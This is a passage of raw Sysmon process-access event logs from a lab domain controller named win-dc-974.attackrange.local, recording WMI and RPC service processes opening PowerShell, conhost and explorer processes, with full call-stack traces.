ws\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.451{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DD2-603E-CAAA-00000000AD01}12336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C9AA-00000000AD01}9940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C8AA-00000000AD01}12460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.451{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C7AA-00000000AD01}12492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DD2-603E-C6AA-00000000AD01}4828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:42.436{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 